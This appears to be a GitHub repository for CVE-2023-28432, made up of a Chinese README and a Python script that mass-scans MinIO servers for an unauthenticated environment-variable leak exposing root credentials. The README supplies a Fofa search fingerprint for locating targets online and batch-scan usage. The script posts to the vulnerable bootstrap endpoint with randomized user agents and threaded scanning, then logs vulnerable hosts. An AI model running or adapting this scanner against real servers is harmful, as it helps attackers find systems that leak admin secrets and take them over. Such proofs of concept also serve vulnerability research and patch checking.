├── README.md ├── exp.png └── minio.py /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-28432 2 | MinIO存在信息泄露漏洞,未经身份认证的远程攻击者通过发送特殊HTTP请求即可获取所有环境变量,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,造成敏感信息泄露,最终可能导致攻击者以管理员身份登录MinIO 3 | 4 | ## Fofa指纹 5 | 6 | #app="minio" 7 | 8 | ## 工具利用 9 | 10 | 11 | python3 minio.py -u http://127.0.0.1:1111 单个url测试 12 | 13 | python3 minio.py -f url.txt 批量检测 14 | 15 | 扫描结束后会在当前目录生成存在漏洞url的vuln.txt 16 | 17 | exp: 18 | ![](./exp.png) 19 | 20 | ## 免责声明 21 | 22 | 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 23 | -------------------------------------------------------------------------------- /exp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MzzdToT/CVE-2023-28432/b47bc3ee9e867cafcd1c55a1213f329d3b3014be/exp.png -------------------------------------------------------------------------------- /minio.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from argparse import ArgumentParser 5 | import threadpool 6 | from urllib import parse 7 | from time import time 8 | import random 9 | #app="minio" 10 | 11 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 12 | filename = sys.argv[1] 13 | url_list=[] 14 | 15 | def get_ua(): 16 | first_num = random.randint(55, 62) 17 | third_num = random.randint(0, 3200) 18 | fourth_num = random.randint(0, 140) 19 | os_type = [ 20 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 21 | '(Macintosh; Intel Mac OS X 10_12_6)' 22 | ] 23 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 24 | 25 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 26 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 27 | ) 28 | return ua 29 | 30 | proxies={'http': 'http://127.0.0.1:8080', 31 | 'https': 'https://127.0.0.1:8080'} 32 | 33 | def wirte_targets(vurl, filename): 34 | with open(filename, "a+") as f: 35 | f.write(vurl + "\n") 36 | 37 | #poc 38 | def check_url(url): 39 | url=parse.urlparse(url) 40 | hostname = url.hostname 41 | url=url.scheme + '://' + url.netloc 42 | vulnurl=url + "/minio/bootstrap/v1/verify" 43 | headers = { 44 | 'User-Agent': get_ua(), 45 | "host":hostname, 46 | "Content-Type": "application/x-www-form-urlencoded" 47 | } 48 | data="" 49 | try: 50 | res = requests.post(vulnurl, verify=False, allow_redirects=False, headers=headers,data=data ,timeout=5) 51 | if res.status_code == 200 and "MinioEn" in res.text: 52 | # print(res.text) 53 | print("\033[32m[+]{} is vulnerable\033[0m".format(url)) 54 | wirte_targets(vulnurl,"vuln.txt") 55 | else: 56 | print("\033[34m[-]{} not vulnerable.\033[0m".format(url)) 57 | except Exception as e: 58 | print("\033[34m[!]{} request false.\033[0m".format(url)) 59 | pass 60 | 61 | #多线程 62 | def multithreading(url_list, pools=5): 63 | works = [] 64 | for i in url_list: 65 | # works.append((func_params, None)) 66 | works.append(i) 67 | # print(works) 68 | pool = threadpool.ThreadPool(pools) 69 | reqs = threadpool.makeRequests(check_url, works) 70 | [pool.putRequest(req) for req in reqs] 71 | pool.wait() 72 | 73 | 74 | if __name__ == '__main__': 75 | arg=ArgumentParser(description='check_url By m2') 76 | arg.add_argument("-u", 77 | "--url", 78 | help="Target URL; Example:http://ip:port") 79 | arg.add_argument("-f", 80 | "--file", 81 | help="Target URL; Example:url.txt") 82 | args=arg.parse_args() 83 | url=args.url 84 | filename=args.file 85 | print("[+]任务开始.....") 86 | start=time() 87 | if url != None and filename == None: 88 | check_url(url) 89 | elif url == None and filename != None: 90 | for i in open(filename): 91 | i=i.replace('\n','') 92 | url_list.append(i) 93 | multithreading(url_list,10) 94 | end=time() 95 | print('任务完成,用时%ds.' %(end-start)) 96 | --------------------------------------------------------------------------------